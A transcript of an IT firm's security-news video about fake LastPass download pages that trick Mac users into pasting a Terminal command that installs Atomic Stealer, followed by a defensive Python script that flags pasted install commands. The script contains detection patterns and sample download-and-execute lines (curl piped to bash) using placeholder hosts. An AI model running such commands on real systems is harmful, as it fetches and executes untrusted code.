Fake LastPass Password Manager Infects Macs with Malware | Sync Up

LastPass is sounding the alarm after attackers have been found impersonating its brand in a widespread malware campaign. We’ll explain how hackers are using fake download pages to spread malware, why password managers are being impersonated, and how to ensure you don’t fall victim as we sit down and sync up with Rocket IT’s weekly technology update.

In this episode, you’ll hear more about:

  • Fake download pages being pushed to the top of search results.
  • How attackers use GitHub to hide malicious installers.
  • What Atomic Stealer malware can grab from an infected device.
  • Why password managers are prime targets for attackers.
  • Quick, practical steps to protect your data.

Video Transcript

Security researchers at LastPass say attackers have set up fake download pages that look like they belong to well-known companies. What’s worse is that these pages have been optimized for search engines, so they’re appearing near the top of search engine results, sometimes even above the official sites they’re impersonating.

Clicking one of these malicious links redirects unsuspecting victims to a secondary site with installation instructions. In these steps, individuals are prompted to copy and paste a command into their device’s Terminal. That command runs a quick download tool, which fetches a malicious installer, rather than the application the user was hoping to download.

In the research conducted by LastPass, the software being delivered by these pages is called Atomic Stealer. This is essentially a subscription-based service that allows attackers to launch malware, steal data, obtain reports on stolen information, and keep a backdoor open on infected devices so attackers can continuously return without being caught.

Now, keep in mind that LastPass isn’t the only brand being impersonated in these campaigns. Branding from 1Password, Dropbox, Notion, Robinhood, Adobe, and more is being used to grow the campaign’s reach and encourage clicks. That said, password managers in particular are valuable targets because they store the keys to a person’s entire online life. If attackers can capture a master password, they can potentially unlock many accounts at once.

Additionally, it’s important to note that this attack has been built to scale. LastPass reports that threat actors are creating many deceptive pages, so takedown requests catch only a few at a time. When one is caught, automated code builds a new page, swaps domains, and optimizes it for search engines. That churn is currently what keeps the campaign resilient and makes manual takedowns an uphill battle.

So, what should you do right now? First, be careful with search results when you’re looking for software. Look to make sure the site you’re visiting is a well-known and trusted domain. Second, if a download page asks you to run a Terminal command, pause and verify it on the vendor’s official website. And if you don’t know what the command actually does, think twice before launching it. Next, centralize software installation in your organization and limit who can run privileged commands on work devices. Fourth, deploy multi-factor authentication policies so that if you do fall victim, you have another line of defense ready. And finally, when vendors like LastPass publish indicators of compromise, share them with your security team so they can check for related activity in your network.

For those organizations without a security team to fall back on, Rocket IT is here to help. Reach out using the link in this video’s description and a member of our team can schedule a security audit of your current network to ensure your people and systems are kept safe. And to stay up to date on technology news, hit that subscribe button and the bell to catch us on next week’s episode of Sync Up with Rocket IT.
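The advice above to pause before running a pasted Terminal command can be turned into a quick triage check. The following is an added example, not code from LastPass or Rocket IT: it flags download-and-run command shapes and lists any hosts that are not on an allow-list of the vendor's official domains. The patterns, the `review_command` name, and the `example.invalid` and `vendor.example` hosts are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit

# Heuristics chosen for this example (assumptions, not vendor-published indicators).
FETCH = r"\b(?:curl|wget)\b"
SHELL = r"\b(?:sh|bash|zsh|osascript|python3?|perl)\b"
CHECKS = [
    ("download piped into an interpreter",
     re.compile(FETCH + r"[^|;]*\|\s*(?:sudo\s+)?" + SHELL)),
    ("download executed through command substitution",
     re.compile(SHELL + r"\s+(?:-c\s+)?[\"']?(?:\$\(|`)\s*" + FETCH)),
    ("base64-decoded text piped into an interpreter",
     re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b[^|;]*\|\s*(?:sudo\s+)?" + SHELL)),
]
URL = re.compile(r"https?://[^\s\"'`)|;]+")


def review_command(command, official_domains):
    """Return (findings, unexpected_hosts) for a command copied from a web page."""
    findings = [label for label, pattern in CHECKS if pattern.search(command)]
    unexpected = []
    for url in URL.findall(command):
        host = (urlsplit(url).hostname or "").lower()
        # Exact match or a true subdomain only, so look-alike names do not pass.
        trusted = any(host == d or host.endswith("." + d) for d in official_domains)
        if host and not trusted and host not in unexpected:
            unexpected.append(host)
    return findings, unexpected


# Constructed sample commands; the hosts are reserved placeholder names.
SAMPLES = [
    '/bin/bash -c "$(curl -fsSL https://get.example.invalid/install.sh)"',
    "curl -s https://cdn.example.invalid/setup | bash",
    "echo QUJDRA== | base64 -d | sh",
    "curl -O https://download.vendor.example/App.dmg",
]

if __name__ == "__main__":
    for cmd in SAMPLES:
        findings, hosts = review_command(cmd, ["vendor.example"])
        print(cmd, "->", findings or "no download-and-run pattern", hosts)
```

A finding is a prompt to stop and verify the command on the vendor's official site, not proof of malware, since some legitimate installers use the same shapes.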
